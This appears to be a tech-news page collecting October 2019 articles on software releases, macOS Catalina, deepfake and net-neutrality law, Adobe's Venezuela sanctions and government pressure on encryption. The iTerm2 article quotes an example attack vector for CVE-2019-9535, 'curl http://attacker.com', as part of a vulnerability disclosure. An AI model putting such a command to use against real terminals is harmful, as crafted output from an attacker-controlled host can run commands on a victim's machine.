Tech News

Bazel 1.0, Google’s polyglot build system switches to semantic versioning for better stability

Bhagyashree R
15 Oct 2019
3 min read
The Bazel team announced the release of Bazel 1.0 last week. The team calls this version a “stability milestone” as it tries to address the stability concerns associated with Bazel by switching to semantic versioning. Along with this change, Bazel 1.0 features new genrule support, C++ and Java-related improvements, gRPC connections with TLS enabled by default, and more.

Bazel is the open-source version of the Blaze tool that Google uses internally. It is a polyglot build system that enables you to automate software building and testing. It provides features like reproducibility via sandboxing, distributed caching, static analysis of build dependencies, a uniform CLI for builds and tests, and more.

Key updates in Bazel 1.0

Windows

A genrule generates one or more files based on a user-defined Bash command. Starting with Bazel 1.0, genrule supports the cmd_bash, cmd_ps, and cmd_bat attributes for better integration on Windows. You can now get a newly generated DEF file from the def_file output group of cc_library.

Execution

Previously, tags were not propagated from a Bazel target to the action’s execution requirements. In Bazel 1.0, this is possible with the help of the --experimental_allow_tags_propagation flag. A rule consists of a series of actions that Bazel performs on inputs to produce a set of outputs. Now all rules have a default exec_properties attribute, just like the one on a platform rule.

Starting with Bazel 1.0, all gRPC connections from Bazel have TLS enabled by default. You can disable TLS by using the grpc:// scheme in your URIs.

Configurability

The config_setting general rule matches an expected configuration state for the purpose of triggering configurable attributes. With the Bazel 1.0 release, it can now check multiple values on "--foo=firstVal --foo=secondVal ..."-style flags. This release also comes with --enable_platform_specific_config, which enables flags in bazelrc according to your host platform.

C++

The cc_* rules now support non-transitive defines via a local_defines attribute. This attribute returns the set of defines needed to compile a particular target. Bazel 1.0 comes with support for ThinLTO builds, the new link-time optimization (LTO) compilation type, on Linux for Clang versions 6.0 or above. You can enable ThinLTO via --features=thin_lto.

Java

The Java-Starlark API java_common.create_provider is now removed. Also removed are the JavaInfo() legacy arguments actions, sources, source_jars, use_ijar, java_toolchain, and host_javabase. Starting with Bazel 1.0, maven_jar and maven_server do not permit the use of plain HTTP URLs without a specified checksum. If you are using maven_jar, the team recommends switching to rules_jvm_external for transitive dependency management.

The team has also advised developers to check the compatibility of their codebase by running bazelisk --migrate, or by building their code with Bazel 0.29.1 and a list of flags, before they upgrade to Bazel 1.0.

These were some of the updates in Bazel 1.0. Check out the official announcement to know what else has shipped in this release.
Libc++ 9 releases with explicit support for WebAssembly System Interface (WASI)

Sugandha Lahoti
14 Oct 2019
2 min read
On Friday, Libc++ version 9 was released. Libc++ is an implementation of the C++ standard library, targeting C++11, C++14 and above. Libc++ 9 is part of the LLVM Compiler Infrastructure release 9.0.0, which was made available in September. Libc++ 9 adds explicit support for the WebAssembly System Interface (WASI) along with major improvements from the previous release and new feature work. Libc++ has also dropped support for GCC 4.9; it now supports GCC 5.1 and above.

WASI is a system interface for the WebAssembly platform. Currently, it supports sandboxed access to the filesystem via a POSIX-like API, as well as other basic interfaces like argv, environment variables, random numbers, and timers. There are three popular implementations of WASI: wasmtime, Mozilla’s WebAssembly runtime; Lucet, Fastly’s WebAssembly runtime; and a browser polyfill.

Improvements in Libc++ 9

  • Minor fixes to std::chrono operators.
  • libc++ now correctly handles Objective-C++ ARC qualifiers in std::is_pointer.
  • Front and back methods are added to std::span.
  • std::to_chars now adds leading zeros.
  • Ensure std::tuple is trivially constructible.
  • std::aligned_union now works in C++03.
  • Output of nullptr to std::basic_ostream is formatted properly.
  • P0608 is now implemented as a sane variant converting constructor.
  • std::is_unbounded_array and std::is_bounded_array added to type traits.
  • std::atomic now includes many new features and specializations.
  • Added the std::midpoint and std::lerp math functions and the std::is_constant_evaluated function.
  • Erase-like algorithms now return size type.
  • Added a contains method to container types.
  • std::swap is now a constant expression.
  • std::move and std::forward now both work in C++03 mode.

People on Twitter were quite happy with WASI support in Libc++:
https://twitter.com/Stephen_d2005/status/1178489876070535168
https://twitter.com/iwillrunoutofsp/status/1182702301062008832

You can also see the release notes for additional information.
Mozilla’s sponsored security audit finds a critical vulnerability in the tmux integration feature of iTerm2

Vincy Davis
10 Oct 2019
3 min read
Yesterday, Mozilla announced that a critical security vulnerability is present in the terminal multiplexer (tmux) integration feature in all versions of iTerm2, the GPL-licensed terminal emulator for macOS. The vulnerability was found in a security audit sponsored by the Mozilla Open Source Support Program (MOSS), which delivers security audits for open source technologies. Mozilla and iTerm2’s developer George Nachman have together developed and released a patch for the vulnerability in iTerm2 version 3.3.6.

According to the official blog post, MOSS sponsored the iTerm2 security audit due to its popularity among developers and system administrators. Another major reason was iTerm2’s processing of untrusted data. Radically Open Security (ROS), the firm that conducted the audit, has ascertained that this vulnerability was present in iTerm2 for the last 7 years.

An attacker can exploit this vulnerability (CVE-2019-9535) by producing malicious output to the terminal using commands on the targeted user’s computer, or by remotely executing arbitrary commands with the privileges of the targeted user. Tom Ritter of Mozilla says, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.”

Nachman says that this is a serious vulnerability because “in some circumstances, it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2.” He also strongly recommended that all users upgrade their iTerm2 to the latest 3.3.6 version.

The CERT Coordination Center has pointed out that since the tmux integration cannot be disabled through configuration, a complete resolution to this vulnerability is not yet available.

Users have appreciated both Mozilla and the iTerm2 team for the security update. A user commented on Hacker News, “I checked for update, installed and relaunched... and found that all my tabs were exactly as they were before, including my tab that had an ssh tunnel running. The only thing that changed was that iTerm got more secure. Impressive work, Nachman.” Another user says, “Thank you, Mozilla. =)”

Visit the Mozilla blog for more details about the vulnerability.
Amazon EKS Windows Container Support is now generally available

Savia Lobo
10 Oct 2019
2 min read
A few days ago, Amazon announced the general availability of Windows Container support on Amazon Elastic Kubernetes Service (EKS). The company announced a preview of Windows Container support in March this year and invited customers to try it out and provide their feedback.

With Windows Container support, development teams can now deploy applications designed to run on Windows Server on Kubernetes, alongside Linux applications. It will also bring more consistency to system logging, performance monitoring, and code deployment pipelines. “We are proud to be the first Cloud provider to have General Availability of Windows Containers on Kubernetes and look forward to customers unlocking the business benefits of Kubernetes for both their Windows and Linux workloads,” the official post mentions.

A few considerations before deploying the worker nodes include:

  • Windows workloads are supported with Amazon EKS clusters running Kubernetes version 1.14 or later.
  • Amazon EC2 instance types C3, C4, D2, I2, M4 (excluding m4.16xlarge), and R3 are not supported for Windows workloads.
  • Host networking mode is not supported for Windows workloads.
  • Amazon EKS clusters must contain one or more Linux worker nodes to run core system pods that only run on Linux, such as coredns and the VPC resource controller.
  • The kubelet and kube-proxy event logs are redirected to the Amazon EKS Windows Event Log and are set to a 200 MB limit.

In a demonstration, Martin Beeby, a principal evangelist for Amazon Web Services, created a new Amazon Elastic Kubernetes Service cluster (the steps work with any cluster running Kubernetes version 1.14 and above), added some new Windows nodes, and deployed a Windows application. For the complete demonstration and to know more about Amazon EKS Windows Container support, read AWS’ official blog post.
Apple’s MacOS Catalina in major turmoil as it kills iTunes and drops support for 32 bit applications

Fatema Patrawala
09 Oct 2019
4 min read
Yesterday, Apple released macOS Catalina, its latest update for Macs and MacBooks. The new operating system can be installed from the homepage of the App Store. Catalina brings a host of new features, including the option to use apps from the iPad as well as to turn the tablet into an additional display for computers. But this new update kills iTunes and faces some major issues. Apple has confirmed that there are some serious issues in macOS Catalina, and affected consumers should refrain from updating the OS until these issues are addressed.

Catalina is finally the download that kills iTunes, which is nowhere to be found in the new update. Instead, Apple has moved the features of iTunes into their own separate Music app; the new update also includes separate apps for Podcasts and TV.

MacOS Catalina update is a big problem for DJs who rely on iTunes

The Mac platform is especially popular with DJs, who cart around MacBook Pro machines jam-packed with music, playlists, mixes and specialist software to allow them to perform every evening. These have been tied to iTunes’ underlying XML database. But after nearly two decades, iTunes is discontinued in macOS Catalina, and the XML file no longer exists to index a local music collection. This has broken popular and niche music tools alike, including major titles such as Traktor and Rekordbox. The Verge reports that Apple has confirmed that this issue is down to its removal of the XML file, but is handing responsibility to the third-party developers behind each app. Unfortunately for Apple’s reputation, those developers had been expecting the new standalone Music app to be able to export an XML file, a feature Apple suggested would be available until they could code around the lack of XML.

Fact Mag also reported, “this news contradicts Apple’s earlier assertion that there would be a way to manually export the XML file from the new Music app, though Catalina’s launch yesterday now proves this isn’t the case at all.” Apple advises DJs that if they rely on software that needs this XML file to function, they should not update to Catalina until individual developers have issued compatibility updates for the new operating system.

Catalina drops support for 32-bit applications and faces other issues as well

Catalina also drops support for 32-bit applications. 32-bit applications will simply not run under the new system; this version of macOS is 64-bit only. If you are a Mac user who relies on a 32-bit app, you get just a single dialog on installation that warns of the loss of support. This raises further questions a user will need answers to: which of your apps are 32-bit and which are 64-bit? And if they are mission-critical in your role, is a 64-bit alternative available?

It’s not just this: a number of creative tools, including Apple Aperture, Microsoft Office 2011 and Adobe CS6, are also experiencing issues with Catalina. Additionally, there are font issues in macOS Catalina; as per the Chromium blog, the macOS system font appears "off" -- too light, with tight kerning.

It is clear that Apple wants to push forward with its platforms, but it needs to remember that the hardware has to work in the real world today. Apple should be consistent in what features it offers, it should provide clear and accurate information to developers and users, and it should at the very least ensure that its own store is in order.
California bans the distribution of political deepfakes ahead of 2020 Presidential election

Fatema Patrawala
09 Oct 2019
5 min read
Yesterday, the California government passed a law that makes it illegal to distribute deepfakes or deceptively edited videos and audio clips intended to damage a politician’s reputation or deceive someone into voting for or against a candidate. Last week, the Governor of California, Gavin Newsom, signed the law, AB 730, which states that it is a crime to distribute audio or video that gives a false, damaging impression of a politician’s words or actions.

The law applies to any candidate within 60 days of an election, but also includes exceptions. For example, the news media is exempted from the requirement, and videos made for satire or parody are also exempted. Potentially deceptive video or audio will also be allowed if it includes a disclaimer noting that it’s fake. The law will sunset in 2023.

Marc Berman, a Democratic member of the California state assembly and chair of the Elections and Redistricting Committee, explained that he was motivated to introduce AB 730 ahead of the 2020 election due to concerns about voter manipulation: “Deepfakes are a powerful and dangerous new technology that can be weaponized to sow misinformation and discord among an already hyper-partisan electorate,” he said in a statement. “Deepfakes distort the truth, making it extremely challenging to distinguish real events and actions from fiction and fantasy.”
https://twitter.com/AsmMarcBerman/status/1181689932693168129

Challenges likely for California’s political deepfake ban

Challenges are likely to arise in the enforcement of this legislation, given the extremely realistic nature of deepfake content. The legislation could also face legal challenges from groups citing the First Amendment right to free political expression; the American Civil Liberties Union and the Electronic Frontier Foundation have criticized the law for potentially harming political speech.

At the same time, Newsom also signed another bill, AB 602, that will allow victims of deepfake pornography to seek legal compensation if their image is manipulated for sexually explicit purposes without their consent. This law was signed in connection with a recent report by cybersecurity firm Deeptrace, which offers deepfake detection tools, estimating that 96% of deepfakes are pornographic, with 99% of them featuring women from the entertainment industry. “When deepfake technology is abused to create sexually explicit material without someone’s permission, it can cause irreparable harm to a victim’s reputation, job prospects, personal relationships and mental health,” Berman said. “Women are disproportionately being harassed and humiliated when their photos are scraped from the internet and seamlessly grafted into pornographic content,” he added.

On Hacker News, users are discussing that such state laws will not be able to change anything at a grassroots level and that propaganda will exist in one form or another. One of them commented, “Propaganda will always exist in one form or another. State law is not going to change that or even put a dent in it. The only decent option to fight propaganda is through the education system. The incoming generations should be armed with sharp critical thinking skills, common sense, and empathy (this one is especially important). There needs to be more demonstrative sessions in classrooms where students actively participate in distinguishing fake content from real ones (and specifically how they can deem it to be fake). My kid's public school does an ok job at teaching the above skills on a surface level, but it comes off as an afterthought as opposed to a primary lesson. I wish they would take it to a more granular level and make it a primary aspect of education.”

Update on 11th Oct, 2019

California Governor Gavin Newsom has signed into law the gig worker protections bill AB-5. This comes shortly after AB-5 passed in the California State Assembly and Senate.
https://twitter.com/ssmith_calabor/status/1182482321695395840

“Today, we are disrupting the status quo and taking a bold step forward to rebuild our middle class and reshape the future of workers as we know it,” bill author and Assemblyperson Lorena Gonzalez said in a statement. “As one of the strongest economies in the world, California is now setting the global standard for worker protections for other states and countries to follow.”

AB-5 will help to ensure gig economy workers are entitled to minimum wage, workers’ compensation and other benefits by requiring employers to apply the ABC test. The bill, first introduced in December 2018, aims to codify the ruling established in Dynamex Operations West, Inc. v Superior Court of Los Angeles. In that case, the court applied the ABC test and decided Dynamex wrongfully classified its workers as independent contractors.
Mozilla Thunderbird 78 will include OpenPGP support, expected to be released by Summer 2020

Savia Lobo
09 Oct 2019
3 min read
Yesterday, the Thunderbird developers announced that they will implement OpenPGP support in Thunderbird 78, which is planned as a Summer 2020 release. This means that support for Thunderbird in Enigmail will be discontinued. Enigmail is a data encryption and decryption extension for Mozilla Thunderbird and the SeaMonkey internet suite that provides OpenPGP public key email encryption and signing.

Patrick Brunschwig, the lead developer of the Enigmail project, says “this is an inevitable step.” The Mozilla developers have been, and still are, actively working on removing old code from their codebase. This affects not only Thunderbird but also add-ons. “While it was possible for Thunderbird to keep old "legacy" add-ons alive for a certain time, the time has come for Thunderbird to stop supporting them,” Brunschwig added.

Thunderbird is unable to bundle the GnuPG software due to incompatible licenses (MPL version 2.0 vs. GPL version 3+). Instead of relying on users to obtain and install external software like GnuPG or GPG4Win, the developers intend to identify and use an alternative, compatible library, and distribute it as part of Thunderbird 78 on all supported platforms.

Will OpenPGP support in Thunderbird 78 mark an end to Enigmail?

Brunschwig, in an email thread, writes that he “will continue to support and maintain Enigmail for Thunderbird 68 until 6 months after Thunderbird 78 will have been released (i.e. a few months beyond Thunderbird 68 EOL).” He further mentioned that Enigmail will not run anymore on Thunderbird 72 beta and newer. Thunderbird 78 will no longer support the APIs that Enigmail requires and will only allow new "WebExtensions". WebExtensions have a completely different API than classical add-ons, and a much-reduced set of capabilities for the user interface. Enigmail will not end, however; Brunschwig will continue to maintain and support Enigmail for Postbox, which runs on a different release schedule than Thunderbird, for the foreseeable future.

“The Thunderbird developers and I have therefore agreed that it's much better to implement OpenPGP support directly in Thunderbird. The set of functionalities will be different than what Enigmail offers, and at least initially likely be less feature-rich. But in my eyes, this is by far outweighed by the fact that OpenPGP will be part of Thunderbird and no add-on and no third-party tool will be required,” Brunschwig writes.

To process OpenPGP messages, GnuPG stores secret keys, public keys of correspondents, and trust information for public keys in its own file format. Thunderbird 78 will not reuse the GnuPG file format, but will rather implement its own storage for keys and trust. Users who already own secret keys from their previous use of Enigmail and GnuPG, and who wish to reuse their existing secret keys, will be required to transfer their keys to Thunderbird 78. On systems that have GnuPG installed, the team may offer assisted importing.

Many users are awaiting the summer release next year.
https://twitter.com/robertjhansen/status/1181561188301320192
https://twitter.com/glynmoody/status/1181550756916334592

ZDNet writes, “What Mozilla devs will do remains to be seen, and they might end up creating a new OpenPGP library from scratch -- which might take up a lot of Mozilla's resources but will be a win for the open-source community as a whole.”

To know more about this news in detail, read the Mozilla Wiki.
Updated Google Mobile Services agreement require OEMs to hide custom navigation system and devices fully compatible with USB Type C port

Fatema Patrawala
08 Oct 2019
4 min read
Yesterday, 9to5Google reported on the updated Google Mobile Services (GMS) agreement. Per the new terms, OEMs who utilize their own gesture navigation systems cannot have those available in the device's initial setup if it ships with Android 10.

Google has struggled to devise a new navigation system for Android over the last few releases. The two-button design from Pie is not liked much in the market, and the new full-gesture setup in Android 10 also has its critics. However, with the new agreement, you will see a lot of Google's gestures in the upcoming new Android 10 devices. At this year’s Google I/O 2019, the company announced that it would support the new gestures and the three-button navbar going forward. It didn't rule out OEMs having their own custom gesture navigation and will indeed let them keep those, but there will be some restrictions. Notably, devices shipping with Android 10 will need to have either the classic three-button nav or Google's gesture navigation enabled out of the box. This makes it sound like the two-button "pill" setup will be effectively dead.

Android 10 devices will not offer custom navigation in the initial setup

Phones often let users choose their navigation options during setup, but Android 10 will not offer custom gesture navigation as an option in the setup wizard at all. So, you'll probably be able to turn on Google's gestures, but something like Samsung's swipe-up targets will only be available if you dig into the settings.

[Image: Samsung's swipe-up navigation targets. Source: 9to5Google]

Hence, the updated Google Mobile Services agreement puts into perspective what Google really wants for Android users. Manufacturers can still include their own navigation solutions, but those solutions aren’t to be immediately available to users during the setup wizard. Users must go into the device settings to toggle alternative navigation systems after the initial setup. Not only are OEM-specific navigation systems not allowed during setup, but manufacturers can’t even prompt users to use them in any way: no notifications, no pop-ups, nor any other means. Google also requires OEMs to hide their custom navigation systems deeper in the settings. Manufacturers can put these settings under new sections like “advanced” or something similar, not easily accessible to the user.

This isn’t necessarily a bad call by Google. More uniformity throughout the Android ecosystem can only be a good thing. The gestures will mature quicker, apps will be forced to adhere to the new navigation systems, and users will get used to it more easily.

Google Mobile Services requires new Android devices to be compatible with Type-C ports

The new Google Mobile Services agreement also outlines the technical requirements that smartphone device makers must meet in order to preload Google Mobile Services. Nearly every Android smartphone or tablet sold internationally has met these requirements, because having access to Google apps is critical for sales outside of China. Subsection 13.6 of this document is titled “USB Type-C Compatibility” and states: “New DEVICES launching from 2019 onwards, with a USB Type-C port MUST ensure full interoperability with chargers that are compliant with the USB specifications and have the USB Type-C plug.”

On Reddit, this news has gained significant traction, and Android users are discussing that this move by Google is good only if the gesture usage works well. Here are some of the comments: “I’m sure people will hate this, but I’m for easier usage for the general public.” Another user responds, “Sure. As long as the gesture usage works really, really well. If it doesn't, this is a bad move.”
Introducing Collapse OS, a z80 kernel that can be designed with “scavenged parts and program microcontrollers”

Vincy Davis
08 Oct 2019
4 min read
There is a new operating system, Collapse OS, designed in anticipation of the collapse of the current economic system. The goal of this project is “to be as self-contained as possible.” With a copy of this project, its developer Virgil Dupras says, a capable person will be able to easily build and install Collapse OS without external resources. It will also be possible to build a machine of an exclusive design, from discarded parts and with low-tech tools.

Dupras believes that the global supply chain will collapse before 2030 and that post-collapse, it would be difficult to reproduce most electronics due to the lack of a supply chain. This will make it impossible to bootstrap new electronic technology and thus limit its growth. At this point, Dupras says, Collapse OS can prove to be a good “starter kit”. He affirms that this operating system can be designed from “scavenged parts and program microcontrollers” with sufficient RAM and storage.

Basically, Collapse OS is a z80 kernel, with a collection of programs, tools, and documentation to assemble an operating system. It can run on minimal and improvised machines and enables interfacing through improvised means like serial, keyboard, and display. The Collapse Operating System can edit text and compile assembler source files for a wide range of microcontrollers and CPUs. It can also read and write from a wide range of storage devices and replicate itself.

What is the current status of Collapse OS?

Collapse OS is built from a GNU environment with minimal tooling and only requires libz80, an emulator of the z80 processor. It also has a shell that can poke memory and I/O and call arbitrary code from memory. It can also read SD cards and has a text editor modeled after UNIX's ed. Two days ago, zasm, a 5K binary of about 2400 SLOC with 8K of RAM usage, was added to the apps, with the aim of assembling the kernel or itself.

Currently, Collapse OS can run on an RC2014 through a serial link with a directly plugged-in PS/2 keyboard. It also runs on a Sega Master System or a MegaDrive (Genesis) with video output and D-Pad input and/or a PS/2 keyboard adapter.

The unique concept of Collapse OS has led to an informative discussion on Hacker News. One of the queries included the availability of a rad-hardened version of the z80. A user answered, “Given the relative simplicity of a z80 compared to newer CPU designs, it should be relatively "easy" to harden it. There was definitely a rad-hardened version of the 8085 (similar to the 8080, and therefore to the z80), which was used on the Sojourner rover (among various other NASA and ESA spacecraft). Seems like RISC processors were more common for this, though (looks like most relatively-recent NASA spacecraft - including pretty much all of NASA's Mars landers after Sojourner - use(d) rad-hardened POWER CPUs, e.g. the RAD6000 and RAD750).”

Many users have found the concept of Collapse OS interesting.
https://twitter.com/thepanta82/status/1181395008827645952
https://twitter.com/bradneuberg/status/1181273072759762944
https://twitter.com/EvanWard97/status/1181452898296832000
https://twitter.com/indigocat/status/1181297674408124418

A Redditor says, “This is so insanely cool, definitely the coolest project I have seen in a while. I am very interested in minimal software (Void Linux and suckless fanatic) but this is taking it to a new level. I have a ton of respect for people who work on projects geared towards more advanced users, I know that most of the time it’s a thankless job but please, for the love of god keep it up. We need more devs like this in the world!”

Read the Collapse OS roadmap page for more information. You can also check out its Github for more details.
Understanding network port numbers, TCP, UDP, and ICMP on an operating system Google’s secret Operating System ‘Fuchsia’ will run Android Applications: 9to5Google Report macOS Catalina is now available for download FCC can’t block states from passing their own net neutrality laws, states a U.S. court The US, UK, and Australian governments call Facebook’s end-to-end encryption plan a hindrance to investigating crimes


Adobe bans accounts of all Venezuelan users in compliance with the US sanctions

Savia Lobo
08 Oct 2019
3 min read
The U.S.-based software company Adobe Inc. announced yesterday that it will be canceling all subscriptions and deactivating all accounts of Venezuelan users. The move is intended to comply with U.S. Government Executive Order 13884, issued on August 5, 2019. In a support document released yesterday, Adobe explains the decision and informs Venezuelans that they have until October 28 to download any files stored in their Adobe accounts, after which their accounts will be deactivated.
https://twitter.com/AdobeCare/status/1181289777397735424

The ban will affect users of both free and paid Adobe services. Users will not be able to pay for new services, nor will they get any refunds, as cited in Executive Order 13884. President Trump's new executive order, backed by the US Department of the Treasury, bans US companies from having any business relations with Venezuelan entities: private companies, government organizations, non-profits, or individual citizens. According to PCMag, “Trump administration issued the sanction order against the government of Venezuelan President Nicolas Maduro for allegedly usurping the presidency and perpetrating human rights abuses against the country's citizens.”
https://twitter.com/AenderLara/status/1181291242531020800

“Under Executive Order 13884, U.S. companies are severely restricted in the business it carries out within Venezuela. As a result, we are ceasing all activity with entities and individuals in Venezuela as well as those who otherwise meet the criteria of Executive Order 13884 or other U.S. sanctions regulations,” the support document says. "We apologize for the inconvenience," adds Adobe.

The U.S. has imposed similar bans on other countries, including Iran, North Korea, and Syria. “Not all US companies follow these bans, but the bigger tech giants do follow US Treasury sanctions to the letter of the law,” ZDNet reports. The ban has sparked many complaints from Adobe customers in Venezuela.
https://twitter.com/faintenkiu/status/1181296289155293191
https://twitter.com/GRamsey_LatAm/status/1181288171562135552

A user on Hacker News commented, “What makes this even worse is that this is only a huge issue because Adobe moved to the whole 'Creative Cloud' thing rather than the old 'buy each product outright' model. With the old model, it wouldn't hurt these creators all that much if their accounts got deactivated since the software would just not get updates. Now on the other hand... they're screwed. It's a 'brilliant' example of how these 'cloud' based services are a bad deal for the user because it puts them at the risk of getting locked out of their own purchases due to legal hassles like this.”

Similar to Adobe, in July Microsoft started enforcing the US Treasury sanctions list on GitHub, a service it bought last year.

macOS Catalina is now available for download

Sugandha Lahoti
08 Oct 2019
3 min read
Apple released macOS Catalina today as the next major update to the company’s Mac operating system. With macOS Catalina, iTunes is split into separate apps for Apple Music, Podcasts, and Apple TV. Catalina also features the Apple Arcade game subscription service and Sidecar, which extends the Mac desktop to a second display. For developers, Catalina has Mac Catalyst for building Mac-compatible versions of iPad apps. macOS Catalina was officially revealed in June at WWDC 2019, and the public beta was released later that month.

What’s new in macOS Catalina

Sidecar

Sidecar extends your Mac workspace by using an iPad as a second display, both wirelessly and when plugged in. Sidecar also supports the Apple Pencil, letting you use the stylus in any Mac app or third-party Mac app that supports stylus input. According to an Apple white paper, the only laptops that Sidecar works on are MacBooks from 2016 or later, MacBook Airs from 2018 or later, and MacBook Pros from 2016 or later. All of them use Apple’s butterfly keyboard.

Addition of Apple Arcade

The Apple Arcade game subscription service is available at $4.99 per month for playing games on the Mac. Apple Arcade subscribers get the full version of every game, including all updates and expansions, without ads or additional in-game purchases. The service launches with a 30-day free trial, and a single subscription includes access for up to six family members with Family Sharing.

iTunes replaced with new entertainment apps

iTunes met its long-awaited end and was replaced by three new apps: Apple Music, Apple Podcasts, and Apple TV. The Music app features over 50 million songs, playlists, and music videos. Apple Podcasts offers more than 700,000 shows in its catalog. Apple TV+, Apple’s video subscription service, will be available in the Apple TV app for Mac starting November 1.

The removal of iTunes is, however, a problem for DJs who rely on XML files to sort through their libraries and quickly find tracks while performing. According to Apple, along with Catalina’s removal of iTunes, users also lose XML file support, as all native music playback on Macs moves to the Music app, which has a new library format.
https://twitter.com/danideahl/status/1181342504949633025

Additional features

macOS also gets Screen Time and stricter privacy protections: apps have to ask for permission to access the desktop, documents, iCloud Drive, and external storage. With Activation Lock, any Mac with a T2 security chip cannot be erased and reactivated without the Apple ID password. The Find My app combines Find My iPhone and Find My Friends into a single, easy-to-use app on Mac, iPad, and iPhone. Mail in macOS Catalina adds the ability to block email from a specified sender, mute an overly active thread, and unsubscribe from commercial mailing lists.

The macOS Catalina update is a free download; install it by clicking the Apple icon in the upper left corner of your screen, choosing System Preferences, and then selecting Software Update.


FCC can’t block states from passing their own net neutrality laws, states a U.S. court

Vincy Davis
07 Oct 2019
5 min read
In November last year, Mozilla filed a case against the FCC (Federal Communications Commission), opposing its decision to retract the net neutrality protection rules. This followed the FCC’s decision to classify ISPs as Title II (common carrier) service providers under the Communications Act of 1934. The Title II classification, unlike Title I, gave the FCC regulatory power over ISPs. Mozilla and other companies, trade groups, states, and organizations protested the decision as an unethical move by the FCC.

Net neutrality compels ISPs to treat all data on the internet equally. This means that all data should be delivered at the same rate, without discrimination. Without net neutrality, ISPs can put data in fast and slow lanes, block sites, or even charge companies more money to prioritize their content.

Read Also: The future of net neutrality is being decided in court right now, as Mozilla takes on the FCC

The latest development came last week, when the U.S. Court of Appeals for the D.C. Circuit upheld the FCC’s decision to revoke the net neutrality rules. FCC Chairman Ajit Pai lauded the decision and called it a victory for consumers and broadband deployment. He added, “The court also upheld our robust transparency rule so that consumers can be fully informed about their online options. Since we adopted the Restoring Internet Freedom Order, consumers have seen 40% faster speeds and millions more Americans have gained access to the Internet.”
https://twitter.com/AjitPaiFCC/status/1179046254833262597

States can pass their own net neutrality laws

Notably, the court also barred the FCC from preemptively stopping states from adopting their own, stricter rules. According to Mozilla, the three-judge panel disagreed with the FCC’s argument about preempting state net neutrality legislation across the board. The judges affirmed, “States have already shown that they are ready to step in and enact net neutrality rules to protect consumers, with laws in California and Vermont among others.”
https://twitter.com/mozilla/status/1179107413699497984

The ruling paves the way for the 34 U.S. states that have already introduced or passed net neutrality rules. Last year, California’s legislature passed the Internet Consumer Protection and Net Neutrality Act of 2018, dubbed the strongest net neutrality law in the country. The bill bans internet providers from blocking or throttling legal content and from prioritizing some sites or services over others. The restrictions apply to both home and mobile connections. Soon after the bill was passed, the FCC and the Department of Justice (DoJ) filed lawsuits blocking its implementation. Along the same lines, Vermont passed a bill establishing consumer protection and net neutrality standards for internet service providers. However, the Vermont Attorney General’s Office has said that, despite the federal appeals court giving states more power to regulate internet providers, the state will not be able to implement the law until the appeals process in the federal case is fully resolved.

The Verge reports that the judges on the panel criticized the FCC for exhibiting “disregard of its duty” by not evaluating how its rule would affect public safety. The court also asked the FCC to consider the impact reclassification will have on pole attachments, and added that the FCC had not sufficiently addressed concerns about how the change would affect the Lifeline internet access program for low-income Americans. Commenting on these findings, Pai said the FCC is working to address “the narrow issues” the court identified.

In a blog post, Mozilla said the court’s decision clearly “underscores the frailty of the FCC’s approach”, as the judges questioned the FCC’s reclassification of broadband internet access from a ‘telecommunications service’ to an ‘information service.’ Mozilla said it looks forward to continuing this fight with the FCC. If either party now decides to appeal, Congress may have to step in to settle the issue. With Democrats vowing to restore the protections and Republicans opposing the bill, the battle may end in a bipartisan compromise. Many U.S. Senators have voiced their support for net neutrality on Twitter.
https://twitter.com/SenatorBennet/status/1179070818267078656
https://twitter.com/SenMarkey/status/1179111199121772544


The US, UK, and Australian governments call Facebook’s end-to-end encryption plan a hindrance to investigating crimes

Bhagyashree R
07 Oct 2019
5 min read
Last week, the US, UK, and Australian governments wrote an open letter to Facebook urging it to drop end-to-end encryption from WhatsApp and to halt its plans to implement end-to-end encryption across its other messaging platforms. The three governments asked the company to ensure “there is no reduction to user safety” and to include “a means for lawful access to the content of communications to protect our citizens.” The open letter is addressed to Facebook CEO Mark Zuckerberg and co-signed by US Attorney General William Barr, Acting Homeland Security Secretary Kevin McAleenan, United Kingdom Home Secretary Priti Patel, and Australia’s Minister for Home Affairs Peter Dutton.

The open letter comes after the launch of a new “UK-US Bilateral Data Access Agreement,” which aims to speed up electronic data access requests by the two countries’ law enforcement agencies. It replaces the current process, called Mutual Legal Assistance, which requires law enforcement agencies to submit a request and have it approved by central governments and can often take months or even years. The new process is expected to take only a few weeks or even days.

Why the US, UK, and Australian governments are against end-to-end encryption

The three governments stated that, although they recognize the importance of strong encryption for services such as banking and commerce, end-to-end encryption would hinder the investigation of serious crimes. The letter reads, “We must find a way to balance the need to secure data with public safety and the need for law enforcement to access the information they need to safeguard the public, investigate crimes, and prevent future criminal activity.” The letter does praise Facebook for reporting 16.8 million cases to the US National Center for Missing & Exploited Children (NCMEC), more than 90% of the 18.4 million total reports in 2018. It further states that Facebook’s own safety systems were able to identify 99% of the content Facebook takes action against, for both child sexual exploitation and terrorism. However, the governments believe that “the mere numbers cannot capture the significance of the harm to children.”

This is not the first time government officials have voiced their dislike of end-to-end encryption. In 2017, after WhatsApp added end-to-end encryption, Amber Rudd, the UK's home secretary at the time, said, “We need to make sure that organizations like WhatsApp, and there are plenty of others like that, don't provide a secret place for terrorists to communicate with each other.” In December 2018, the Australian government passed a controversial anti-encryption law that allows law enforcement agencies to compel tech companies to hand over encrypted messaging data.

Read also: “Five Eyes” call for backdoor access to end-to-end encryption to tackle ‘emerging threats’ despite warnings from cybersecurity and civil rights communities

The governments list the following steps for Facebook and other similar companies:
  • Design systems so that the companies behind them can act effectively against illegal content without hampering the safety of others.
  • Allow law enforcement lawful access to content in a readable and usable format.
  • Consult with governments and let those consultations influence companies’ design decisions.
  • Do not implement the proposed changes until the safety of users is fully ensured by tested and operational systems.

What privacy experts and users think about this open letter to Facebook

The Electronic Frontier Foundation (EFF), a non-profit that supports civil liberties and other legal issues pertaining to digital rights, called this act a “staggering attempt to undermine the security and privacy of communications tools used by billions of people." It said, "Facebook should not comply.” The organization further said that the three governments failed to take into account the “severe risks” of introducing backdoors.
https://twitter.com/EFF/status/1180978792052998145

